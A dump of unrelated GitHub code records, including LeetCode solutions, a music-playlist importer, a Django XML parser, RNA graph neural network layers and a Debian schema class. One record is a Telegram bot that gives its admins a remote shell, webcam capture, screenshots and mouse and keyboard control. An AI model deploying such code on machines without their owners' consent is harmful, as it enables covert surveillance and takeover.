ListNode(9, ListNode(9, None)))))))\nr2 = ListNode(9, ListNode(9, ListNode(9, ListNode(9, None))))\n\nt0 = time.perf_counter_ns()\n\ns = Solution()\n\nprint(s.addTwoNumbers(l1, l2))\nprint(s.addTwoNumbers(r1, r2))\n\nt1 = time.perf_counter_ns()\n\nprint(f\"{(t1-t0)/1000000} ms.\") 
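\n\n# Editorial note (illustrative sketch, not part of the original solution): ListNode defines no\n# __str__, so the prints above show object reprs. A tiny helper would make the digits readable:\n# def render(node):\n#     vals = []\n#     while node:\n#         vals.append(str(node.val))\n#         node = node.next\n#     return '->'.join(vals)\n# print(render(s.addTwoNumbers(l1, l2)))  # expected: 7->0->8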
","repo_name":"Stasky745/ProgrammingTraining","sub_path":"Leetcode/.history/Medium/2_addTwoNumbers_20220520183601.py","file_name":"2_addTwoNumbers_20220520183601.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10071324313","text":"from ytmusicapi import YTMusic\n\nytmusic = YTMusic('headers_auth.json')\nplaylistId = ytmusic.create_playlist(\"Yandex Music\", \"Imported from Yandex Music\")\n\nfp = open('yandexTracks.txt', 'r')\nfSkipped = open('youtubeSkippedDuringImport.txt', 'a')\n\nfor track in fp:\n print(track)\n search_results = ytmusic.search(track.strip())\n\n if ('videoId' not in search_results[0]):\n fSkipped.writelines([track.strip(), '\\n'])\n continue\n\n ytmusic.add_playlist_items(playlistId, [search_results[0]['videoId']])\n ytmusic.rate_song(search_results[0]['videoId'], 'LIKE')\n\nfp.close()\nfSkipped.close()\n","repo_name":"Lindar90/YandexToYoutubeMusicImporter","sub_path":"importToYoutubeMusic.py","file_name":"importToYoutubeMusic.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39859518128","text":"#!/usr/bin/python\n\nimport ast\n\nclass ASTPath:\n\n def __init__(self, file_path):\n self.file_path = file_path\n\n with open(file_path) as code_file:\n code_lines = code_file.readlines()\n\n code = \"\".join(code_lines)\n\n self.paths = self.get_paths(code)\n\n @staticmethod\n def get_paths(code):\n code_ast = ast.parse(code)\n \n paths = []\n ASTPath.build_paths(code_ast, paths, \"\")\n\n return paths\n\n @staticmethod\n def build_paths(node, paths, path_so_far):\n for field in ast.iter_fields(node):\n if(field[0] != 'body'):\n path_so_far += field[0]\n path_so_far += type(field[1]).__name__\n\n for child_node in ast.iter_child_nodes(node):\n ASTPath.build_paths(child_node, paths, path_so_far)\n\n if path_so_far:\n paths.append(path_so_far)\n","repo_name":"panchdevs/code-detection","sub_path":"lib/ASTPath.py","file_name":"ASTPath.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"33782197619","text":"from django.shortcuts import render\nfrom xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\nfrom .models import *\nimport urllib.request\nimport sys\n\n\ndef normalize_whitespace(text):\n\tstring = \"\"\n\tresult = string.join(text)\n\treturn result\n\nclass myContentHandler(ContentHandler):\n\tdef __init__ (self):\n\t\tself.inItem = False\n\t\tself.inContent = False\n\t\tself.theContent = \"\"\n\t\tself.entidad = \"\"\n\t\tself.nombre = \"\"\n\t\tself.descripcion = \"\"\n\t\tself.accesibilidad = \"\"\n\t\tself.contenturl = \"\"\n\t\tself.first = True\n\t\tself.nombrevia = \"\"\n\t\tself.clasevial = \"\"\n\t\tself.tiponum = \"\"\n\t\tself.num = \"\"\n\t\tself.localidad = \"\"\n\t\tself.provincia = \"\"\n\t\tself.codigopostal = \"\"\n\t\tself.barrio = \"\"\n\t\tself.distrito= \"\"\n\t\tself.coordenadax = \"\"\n\t\tself.coordenaday= \"\"\n\t\tself.latitud = \"\"\n\t\tself.longitud = \"\"\n\t\tself.telefono = \"\"\n\t\tself.email = \"\"\n\t\tself.attr = \"\"\n\t\tself.url = False\n\n\tdef startElement (self, name, attrs):\n\t\tif name == 'contenido':\n\t\t\tself.inItem = True\n\t\tif self.inItem:\n\t\t\tif name == 'atributo':\n\t\t\t\tself.attr = normalize_whitespace(attrs.get('nombre'))\n\n\t\t\t\tif self.attr == 
\"ID-ENTIDAD\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"NOMBRE\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"DESCRIPCION\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"ACCESIBILIDAD\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"CONTENT-URL\":\n\t\t\t\t\tself.url = True\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"NOMBRE-VIA\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"CLASE-VIAL\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"TIPO-NUM\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"NUM\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"LOCALIDAD\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"PROVINCIA\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"CODIGO-POSTAL\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"BARRIO\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"DISTRITO\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"COORDENADA-X\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"COORDENADA-Y\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"DATOSCONTACTOS\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"TELEFONO\":\n\t\t\t\t\tself.inContent = True\n\t\t\t\telif self.attr == \"EMAIL\":\n\t\t\t\t\tself.inContent = True\n\n\n\tdef endElement (self, name):\n\t\tif self.inContent:\n\t\t\tself.theContent = normalize_whitespace(self.theContent)\n\n\t\tif self.attr == \"ID-ENTIDAD\":\n\t\t\tself.entidad = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"NOMBRE\":\n\t\t\tself.nombre = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"DESCRIPCION\":\n\t\t\tself.descripcion = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"ACCESIBILIDAD\":\n\t\t\tself.accesibilidad = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"CONTENT-URL\":\n\t\t\tself.contenturl = normalize_whitespace(self.theContent)\n\t\t\tself.url = False\n\t\t\tself.first = False\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"NOMBRE-VIA\":\n\t\t\tself.nombrevia = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"CLASE-VIAL\":\n\t\t\tself.clasevial = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"TIPO-NUM\":\n\t\t\tself.tiponum = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"NUM\":\n\t\t\tself.num = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"LOCALIDAD\":\n\t\t\tself.localidad = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"PROVINCIA\":\n\t\t\tself.provincia = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"CODIGO-POSTAL\":\n\t\t\tself.codigopostal = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"BARRIO\":\n\t\t\tself.barrio = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"DISTRITO\":\n\t\t\tself.distrito = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"COORDENADA-X\":\n\t\t\tself.coordenadax = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"COORDENADA-Y\":\n\t\t\tself.coordenaday = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"DATOSCONTACTOS\":\n\n\t\t\tp = Museo(entidad=self.entidad, nombre=self.nombre, descripcion=self.descripcion, accesibilidad=self.accesibilidad, 
content_url=self.contenturl, localizacion=self.nombrevia, clase_vial=self.clasevial, tipo_num=self.tiponum, num=self.num, localidad=self.localidad, provincia=self.provincia, codigo_postal=self.codigopostal, barrio=self.barrio, distrito=self.distrito, coordenada_x=self.coordenadax, coordenada_y=self.coordenaday, telefono=self.telefono, email=self.email)\n\t\t\tp.save()\n\n\t\tif self.attr == \"TELEFONO\":\n\t\t\tself.attr = \"DATOSCONTACTOS\"\n\t\t\tself.telefono = self.theContent\n\t\t\tself.theContent = \"\"\n\t\telif self.attr == \"EMAIL\":\n\t\t\tself.attr = \"DATOSCONTACTOS\"\n\t\t\tself.email = self.theContent\n\t\t\tself.theContent = \"\"\n\n\tdef characters (self, chars):\n\t\tif self.inContent:\n\t\t\tif self.url:\n\t\t\t\tif self.first == True:\n\t\t\t\t\tself.theContent = self.theContent + chars\n\t\t\t\telse:\n\t\t\t\t\tself.first = True\n\t\t\t\t\tself.theContent = chars\n\t\t\telse:\n\t\t\t\tself.theContent = chars\n\n\ndef get_data():\n\ttheParser = make_parser()\n\ttheHandler = myContentHandler()\n\ttheParser.setContentHandler(theHandler)\n\n\turl = 'https://datos.madrid.es/portal/site/egob/menuitem.ac61933d6ee3c31cae77ae7784f1a5a0/?'\n\turl += 'vgnextoid=00149033f2201410VgnVCM100000171f5a0aRCRD&format=xml&file=0&filename=201132-0-'\n\turl += 'museos&mgmtid=118f2fdbecc63410VgnVCM1000000b205a0aRCRD&preview=full'\n\txmlFile = urllib.request.urlopen(url)\n\ttheParser.parse(xmlFile)\n\n\treturn(\"Parser completed\")\n","repo_name":"ElenaBenito/X-Serv-Practica-Museos","sub_path":"practica/museos/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"}
+{"seq_id":"17510651126","text":"import random\nimport json\n\n# Generate 100,000 transaction records\ntransactions = []\nfor i in range(100000):\n    # Randomly pick two distinct accounts\n    account_ids = random.sample(range(1, 100001), 2)\n    from_account_id = account_ids[0]\n    to_account_id = account_ids[1]\n\n    # Transaction amount (random generation commented out; fixed at 100)\n    # amount = round(random.randrange(100, 1000), 2)\n    amount = 100\n\n    # Append the transaction record\n    transaction = {\n        \"from_account_id\": from_account_id,\n        \"to_account_id\": to_account_id,\n        \"amount\": amount\n    }\n    transactions.append(transaction)\n\n# Save the transaction records to a JSON file\nwith open('transactions.json', 'w') as f:\n    json.dump(transactions, f)\n","repo_name":"Tanlikfeng/atm-transaction","sub_path":"generate_transaction.py","file_name":"generate_transaction.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"39282185019","text":"import torch\nfrom torch.nn import LSTM, Conv1d\nimport torch_geometric\nfrom torch_geometric.nn import Linear, GCNConv, GatedGraphConv\nfrom torch_geometric.utils import to_dense_batch, remove_self_loops\nimport torch.nn.functional as F\nimport gin\n\n\n# H(l-1)AW\nclass LinearAggregation(torch_geometric.nn.MessagePassing):\n    def __init__(self, input_channels, output_channels):\n        super().__init__()\n        self.lin = Linear(input_channels, output_channels).double() #H(l-1)W\n\n    def forward(self,x, edge_index, edge_weight):\n        x = self.lin(x)\n\n        x = self.propagate(edge_index, x=x, norm=edge_weight)\n\n        return x\n\n    def message(self, x_j, edge_index, norm):\n        return norm.view(-1,1) * x_j\n\nclass RPINetGNNLayer(torch_geometric.nn.MessagePassing):\n    def __init__(self, input_channels, output_channels, filter_size, struc_op=None):\n        super().__init__()\n        self.lin = Linear(input_channels, output_channels)\n        self.conv = Conv1d(input_channels, output_channels, filter_size, 
padding='same')\n self.lstm = LSTM(output_channels, output_channels, batch_first=True)\n if struc_op is None:\n self.struc_op = struc_op\n else:\n self.struc_op = struc_op(input_channels, output_channels)\n\n def forward(self, x, h0, c0, edge_index, batch, edge_weight):\n #x = [b_S, Lenghth, embed]\n #h0 = [1,b_S, embed_dim]\n #\n \n ## py_geometric databatch -> batched tensor / Adds fake nodes to keep length equal\n batched_x, mask = to_dense_batch(x, batch)\n batched_x = torch.transpose(batched_x, 1, 2)\n\n\n\n ## convolution \n conv_x = self.conv(batched_x)\n\n # AH(l-1)W -- Linear projection H(l-1)W -> Aggregated over adjacent neighbour nodes\n if self.struc_op is None:\n lin_x = self.lin(x)\n lin_x, _= to_dense_batch(self.propagate(edge_index, x=lin_x, norm=edge_weight), batch)\n\n else:\n lin_x = self.struc_op(x, edge_index, edge_weight)\n lin_x, _= to_dense_batch(lin_x, batch)\n \n # linear = aggregated(add) messages of base pairings + conv(filter size 3) = messages from backbone neighbors\n\n messages = torch.transpose(F.relu(torch.transpose(lin_x, 1, 2)+conv_x), 1,2)\n\n batched_x = torch.transpose(batched_x, 1, 2)\n\n # if l=1, set cell memory to\n if c0 is None:\n c0 = torch.zeros(1, batched_x.shape[0], messages.shape[2]).double().cuda()\n if h0 is None:\n h0 = torch.zeros(1, batched_x.shape[0], messages.shape[2]).double().cuda()\n\n \n output, (hn,cn) = self.lstm(messages, (h0, c0))\n\n\n #apply mask to 'unbatch' output tensor again [batch_size, x, y] -> [X,Y] combined graph\n return output[mask], output, cn\n\n def message(self, x_j, edge_index, norm):\n # normalize neighbor messages x_j by bpp of nodes\n return norm.view(-1,1) * x_j\n\nclass GCN_CNN_Layer(torch_geometric.nn.MessagePassing):\n def __init__(self, input_channels, output_channels, kernel_size):\n super().__init__()\n self.kernel_size = kernel_size\n\n self.bb_conv = Conv1d(input_channels, output_channels, padding='same', kernel_size=kernel_size)\n self.bp_conv = GCNConv(input_channels, output_channels)\n\n def forward(self, x, edge_index, edge_weight, batch):\n dense_batch, mask = to_dense_batch(x,batch)\n bb = self.bb_conv(torch.transpose(dense_batch, 1, 2)).transpose(1,2)[mask]\n\n bp = self.bp_conv(x, edge_index, edge_weight)\n\n out = F.relu(bb+bp)\n\n out = F.dropout(out, training=self.training)\n\n return(out)\n\n@gin.configurable \nclass Sep_Seq_Struc_Layer(torch.nn.Module):\n def __init__(self, input_channels, output_channels, seq_op, struc_op, no_input_channels=False ,**kwargs):\n super().__init__()\n self.seq_op = seq_op(input_channels, output_channels)\n if no_input_channels:\n self.struc_op = struc_op(output_channels, **kwargs)\n else:\n self.struc_op = struc_op(input_channels, output_channels)\n \n\n def forward(self, x, edge_index, edge_weight, batch):\n seq_x = self.seq_op(x, batch)\n struc_x = self.struc_op(x, edge_index, edge_weight)\n\n out = F.relu(seq_x+struc_x)\n\n return(out)\n\n@gin.configurable \nclass Sep_Seq_Struc_Layer_LSTM(torch.nn.Module):\n def __init__(self, input_channels, output_channels, seq_op, struc_op, no_input_channels=False ,**kwargs):\n super().__init__()\n self.seq_op = seq_op(input_channels, output_channels)\n \n if no_input_channels:\n self.struc_op = struc_op(output_channels)\n else:\n self.struc_op = struc_op(input_channels, output_channels)\n \n self.lstm = LSTM(output_channels, output_channels, batch_first=True)\n\n def forward(self, x, edge_index, edge_weight, batch, cell_mem):\n seq_x = self.seq_op(x, batch)\n struc_x = self.struc_op(x, edge_index, edge_weight)\n\n 
out = F.relu(seq_x+struc_x)\n\n out, mask = to_dense_batch(out, batch)\n\n\n if cell_mem is None:\n cell_mem = torch.zeros(1, out.shape[0], out.shape[2]).double().cuda()\n \n h0 = torch.zeros(1, out.shape[0], out.shape[2]).double().cuda()\n\n out, (hn,cn) = self.lstm(out, (h0, cell_mem))\n\n return out[mask], out, cn","repo_name":"nicolasgoedert97/RNARepLearn","sub_path":"RNARepLearn/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"25934768170","text":"import calendar\ndef season(month):\n if month in ('December', 'January', 'February'):\n return ('Winter')\n elif month in ('March', 'April', 'May'):\n return ('Spring')\n elif month in ('June', 'July', 'August'):\n return ('Summer')\n elif month in ('September', 'October', 'November'):\n return ('Fall')\n\nmonth = calendar.month_name[int(input(\"\"\"Write a number from 1 to 12 to know what season is this month, where 1 -> January and 12 -> December\\nNumber:\"\"\"))]\nprint(season(month))","repo_name":"Bolshartd/Tproger","sub_path":"season_from_month.py","file_name":"season_from_month.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32132299521","text":"from typing import Any, Dict, Mapping, Type, TypeVar, Union, cast, no_type_check\n\nfrom debian.deb822 import Deb822, RestrictedWrapper\n\nfrom debutizer.deb822_utils import Field\n\nT = TypeVar(\"T\", bound=Deb822)\nCLS = TypeVar(\"CLS\", bound=\"Deb822Schema\")\n\nSOURCE = Union[Deb822, RestrictedWrapper]\n\n\nclass Deb822Schema:\n FIELDS: Dict[str, Field]\n\n def __init__(self, deb822_type: Type[T]):\n self._deb822_type = deb822_type\n\n def serialize(self) -> T:\n deb822 = self._deb822_type()\n\n for attr_name, field in self.__class__.FIELDS.items():\n value = self.__getattribute__(attr_name)\n if value is not None:\n deb822[field.name] = field.serialize(value)\n\n return cast(T, deb822)\n\n @classmethod\n @no_type_check # mypy has issues with iterators\n def _deserialize_fields(cls, source: SOURCE) -> Dict[str, Any]:\n inputs = {}\n\n for attr_name, field in cls.FIELDS.items():\n if field.name in source:\n inputs[attr_name] = field.deserialize(source[field.name])\n else:\n inputs[attr_name] = None\n\n return inputs\n\n @classmethod\n def deserialize(cls: Type[CLS], source: SOURCE) -> CLS:\n inputs = cls._deserialize_fields(source)\n return cls(**inputs)\n","repo_name":"velovix/debutizer","sub_path":"debutizer/deb822_schema.py","file_name":"deb822_schema.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"42649540398","text":"from gtts import gTTS\nfrom playsound import playsound\nimport telebot\nimport pyautogui\nfrom PIL import Image, ImageDraw, ImageFont\nimport os\nimport codecs\nimport subprocess as sp\nimport cv2\nimport time\nfrom functools import *\nimport json\nimport sys\nhomedir = \"/home/salih/gits\"\njf = json.load(open(f'{homedir}/PyConnectTGbot/admins.json'))\ndef photocap():\n import cv2\n camera_port = 0\n camera = cv2.VideoCapture(camera_port)\n time.sleep(0.1) \n return_value, image = camera.read()\n cv2.imwrite(f\"{homedir}/PyConnectTGbot/camout.png\", image)\n del(camera)\napi_key = open(f'{homedir}/PyConnectTGbot/api','r+').read()\nbot = telebot.TeleBot(api_key)\nosmode = False\ndef is_admin(id):\n admins = jf[\"admins\"]\n 
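# NOTE: admins.json stores chat IDs as strings, hence the str() conversion below.\n    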
return str(id) in admins\n\ndef restrict():\n    def deco_restrict(f):\n        @wraps(f)\n        def f_restrict(message, *args, **kwargs):\n            id = message.chat.id\n            if is_admin(id):\n                return f(message, *args, **kwargs)\n            else:\n                bot.send_message(chat_id=message.chat.id, text='You have no access!')\n        return f_restrict  \n    return deco_restrict\n\n@bot.message_handler(commands=['start'])\ndef strt(message):\n    bot.reply_to(message, message.chat.id)\n\n@bot.message_handler(commands=['ss','screenshot'])\n@restrict()\ndef screenshot(message):\n    if os.environ[\"XDG_SESSION_TYPE\"]==\"wayland\":\n        os.system(f'grim -c -t png \"{homedir}/PyConnectTGbot/ss.png\"')\n    else:\n        pyautogui.screenshot(f'{homedir}/PyConnectTGbot/ss.png')\n    bot.send_photo(message.chat.id, open(f'{homedir}/PyConnectTGbot/ss.png', 'rb'))\n    try:\n        os.remove(f'{homedir}/PyConnectTGbot/ss.png')\n    except:\n        pass\n@bot.message_handler(commands=['cam','camera'])\n@restrict()\ndef cam(message):\n    photocap()\n    bot.send_photo(message.chat.id, open(f'{homedir}/PyConnectTGbot/camout.png', 'rb'))\n    try:\n        os.remove(f'{homedir}/PyConnectTGbot/camout.png')\n    except:\n        pass\n@bot.message_handler(commands=['mp','mouseposition'])\n@restrict()\ndef mp(message):\n    try:\n        os.remove(f'{homedir}/PyConnectTGbot/ss.png')\n        os.remove(f'{homedir}/PyConnectTGbot/ssout.png')\n    except:\n        pass\n    if os.environ[\"XDG_SESSION_TYPE\"]==\"wayland\":\n        os.system(f'grim -c -t png \"{homedir}/PyConnectTGbot/ss.png\"')\n    else:\n        pyautogui.screenshot(f'{homedir}/PyConnectTGbot/ss.png')\n    ssimage = Image.open(f'{homedir}/PyConnectTGbot/ss.png')\n    xpos = pyautogui.position()[0]\n    ypos = pyautogui.position()[1]\n    draw = ImageDraw.Draw(ssimage)\n    draw.rectangle((xpos, ypos, xpos + 20, ypos + 20), fill=True, outline='green', width=1)\n    ssimage.save(f'{homedir}/PyConnectTGbot/ssout.png')\n    bot.send_message(text=str(pyautogui.position()),chat_id=message.chat.id)\n    bot.send_photo(message.chat.id, open(f'{homedir}/PyConnectTGbot/ssout.png','rb'))\n    try:\n        os.remove(f'{homedir}/PyConnectTGbot/ss.png')\n        os.remove(f'{homedir}/PyConnectTGbot/ssout.png')\n    except:\n        pass\n@bot.message_handler(commands=['newfile','nf'])\n@restrict()\ndef newf(message):\n    inp = message.text\n    inplist = inp.split('\\n')\n    filename = inplist[1]\n    code = inp.split(inplist[1])[1]\n    with open(filename,'w+') as f:\n        f.write(code)\n\n@bot.message_handler(commands=['test','t'])\n@restrict()\ndef test(message):\n    bot.send_message(chat_id=message.chat.id,text=message)\n@bot.message_handler(commands=['moveTo','moveto'])\n@restrict()\ndef ptmove(message):\n    print(message.text)\n    msg = message.text\n    try:\n        ml = msg.split(' ')\n        x = int(ml[1])\n        y = int(ml[2])\n        pyautogui.moveTo(x,y)\n    except:\n        bot.send_message(chat_id=message.chat.id, text=\"usage: /moveTo x y\")\n@bot.message_handler(commands=['move','move'])\n@restrict()\ndef ptmove_rel(message):\n    print(message.text)\n    msg = message.text\n    try:\n        ml = msg.split(' ')\n        x = int(ml[1])\n        y = int(ml[2])\n        pyautogui.move(x,y)\n    except:\n        bot.send_message(chat_id=message.chat.id, text=\"usage: /move x y\")\n@bot.message_handler(commands=['type'])\n@restrict()\ndef ptwrite(message):\n    inpt = str(message.text).split('/type ')[1]\n    pyautogui.typewrite(inpt)\n@bot.message_handler(commands=['press'])\n@restrict()\ndef ptpress(message):\n    inpt = str(message.text).split('/press ')[1]\n    pyautogui.press(inpt)\n@bot.message_handler(commands=['titles'])\n@restrict()\ndef getttl(message):\n    if sys.platform != \"linux\":\n        bot.send_message(text=str(pyautogui.getAllTitles()),chat_id=message.chat.id)\n    else: \n        bot.send_message(text=sp.check_output('wmctrl 
-l',shell=True).decode('utf-8'),chat_id=message.chat.id)\n@bot.message_handler(commands=['click','c'])\n@restrict()\ndef ptclick(message):\n    if message.text == \"/click\":\n        pyautogui.click()\n    else:\n        tinp = message.text.split(' ')\n        x = tinp[1]\n        y = tinp[2]\n        pyautogui.click(x,y)\n@bot.message_handler(commands=['rclick','rc'])\n@restrict()\ndef ptrclick(message):\n    if message.text == \"/rclick\":\n        pyautogui.rightClick()\n    else:\n        tinp = message.text.split(' ')\n        x = tinp[1]\n        y = tinp[2]\n        pyautogui.rightClick(x,y)\n@bot.message_handler(commands=['talk','tts'])\n@restrict()\ndef recaud(message):\n    mytext = str(message.text).split(f\"{message.text.split(' ')[0]}\")[1]\n    filename = f'ttss.mp3'\n    language = 'en'\n    myobj = gTTS(text=mytext, lang=language, slow=False)\n    myobj.save(filename)\n    bot.send_message(text=mytext,chat_id=message.chat.id)\n    playsound(filename)\n    #os.system(f'start {filename}')\n    bot.send_audio(chat_id=message.chat.id, audio=open(filename, 'rb'))\n@bot.message_handler(commands=['doubleclick','dc'])\n@restrict()\ndef ptdclick(message):\n    if message.text == \"/doubleclick\":\n        pyautogui.doubleClick()\n    else:\n        tinp = message.text.split(' ')\n        x = tinp[1]\n        y = tinp[2]\n        pyautogui.doubleClick(x,y)\n\n@bot.message_handler(commands=['restart'])\n@restrict()\ndef restart(message):\n    bot.reply_to(message,'Restarting...')\n    os.execv(sys.executable, ['python'] + sys.argv)\n\n@bot.message_handler(commands=['os','cmd','shell'])\n@restrict()\ndef oscmd(message):\n    bot.send_message(text=\"Shell:\",chat_id=message.chat.id)\n    # register the shell handler once; the original `while osmode:` loop re-registered it endlessly\n    @bot.message_handler()\n    @restrict()\n    def oscmdmode(message):\n        msg = str(message.text)\n        osmode = True\n        print(msg)\n        if msg == \"exit\":\n            osmode = False\n            bot.send_message(chat_id=message.chat.id, text=\"Exiting Shell\")\n            os.execv(sys.executable, ['python'] + sys.argv)\n\n        if osmode:\n            if not msg.startswith('/'):\n                try:\n                    outpt = sp.check_output(msg,shell=True)\n                    outpt = codecs.decode(outpt, 'UTF-8')\n                    bot.reply_to(message=message, text=outpt)\n                    print(outpt)\n                except UnicodeDecodeError:\n                    outpt = sp.check_output(msg,shell=True)\n                    outpt = str(outpt)\n                    bot.reply_to(message=message, text=outpt)\n                    print(outpt)\n            else:\n                pass \nprint('Bot Started')\nbot.polling(non_stop=True)\n","repo_name":"salihburock/PyConnectTGbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"}
+{"seq_id":"70259491130","text":"# Recursion mini-project 2 - Factorial\n''' \nFactorial\n- The product of an integer n and all the positive integers below it.\n- Factorial of 4 = 4 * 3 * 2 * 1 = 24  \n- It's denoted by the ! after the number, so 5 factorial would be written as 5!\n- Factorial 0 is 1\n- Base case: \n    If asked for the factorial of 0, return 1 since 0! = 1  \n\nRecursive build\n1! = 1\n2! = 2 * 1!\n3! = 3 * 2!\n4! = 4 * 3!\n5! = 5 * 4!\n...\nn! = n * (n-1)!  \nfor n > 0\n\nfactorial(1) = 1\nfactorial(2) = 2 * factorial(1)\nfactorial(3) = 3 * factorial(2)\nfactorial(4) = 4 * factorial(3)\nfactorial(5) = 5 * factorial(4)  \n\n'''\n\ndef factorial_recur(n):\n    if n == 0:\n        return 1\n    else:\n        return n * factorial_recur(n-1)\n\nz = 0 # expecting 1\nprint(f\"The value of {z}! is {factorial_recur(z)}\")\nz = 1 # expecting 1\nprint(f\"The value of {z}! is {factorial_recur(z)}\")\nz = 5 # expecting 120\nprint(f\"The value of {z}! 
is {factorial_recur(z)}\")","repo_name":"Zioq/Algorithms-and-Data-Structures-With-Python","sub_path":"12.Merge Sort with Recursion/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6372071353","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def middleNode(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n #using the fast and slow pointer approach also\n #if we have 2 middle node,we return the 2nd middle node which is the SLOW node when fast or fast.next becomes null or none\n #https://www.youtube.com/watch?v=_cl3O4FBZh8 check that video to understand better\n slow=fast=head\n while slow and fast and fast.next:\n slow=slow.next\n fast=fast.next.next\n return slow\n ","repo_name":"Trojan9/Data_Structures_And_Algorithm","sub_path":"Middle-of-the-Linked-List.py","file_name":"Middle-of-the-Linked-List.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74155053688","text":"import pandas as pd\nimport glob\nimport numpy as np\n\n# Specify the directory where your CSV files are located\ncsv_dir = './Data/raw/'\n\n# List all CSV files in the directory\ncsv_files = glob.glob(csv_dir + '*.csv')\n\n# Initialize an empty list to store DataFrames\ndataframes = []\n\n# Loop through each CSV file, read it, and extract the first 4 columns\nfor csv_file in csv_files:\n df = pd.read_csv(csv_file, header=None)\n df = df.iloc[:, :4]\n df.columns = ['Datetime', 'mfv_gse_x', 'mfv_gse_y', 'mfv_gse_z']\n dataframes.append(df)\n# Concatenate the DataFrames into a single DataFrame\ncombined_df = pd.concat(dataframes, ignore_index=True)\n\n# Convert the 'Datetime' column to datetime format\ncombined_df['Datetime'] = pd.to_datetime(combined_df['Datetime'], format='%Y-%m-%d %H:%M:%S')\n\n# Sort the DataFrame by the 'Datetime' column\ncombined_df = combined_df.sort_values(by='Datetime')\ncombined_df = combined_df.fillna(-np.inf)\n\ncombined_df.to_csv('./Data/dscovr_raw_clean.csv')\n","repo_name":"umar-b/SPACE-APPS-CHALLENGE-2023","sub_path":"dscovr_raw_data.py","file_name":"dscovr_raw_data.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13493553141","text":"import os\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score, precision_recall_curve, auc\nfrom typing import Union\n\n\nclass Evaluator:\n \"\"\"Abstract class. 
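Editor's note on the factorial record above — factorial_recur never reaches its base case for negative input and exhausts Python's recursion limit for large n. A small iterative sketch with an input guard (the function name is mine):

def factorial_iter(n):
    # The recursive version recurses past 0 for n < 0 and hits
    # RecursionError for large n; a loop avoids both.
    if n < 0:
        raise ValueError("factorial is undefined for negative integers")
    result = 1
    for k in range(2, n + 1):
        result *= k
    return result

assert factorial_iter(0) == 1    # 0! = 1
assert factorial_iter(5) == 120  # matches factorial_recur(5)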
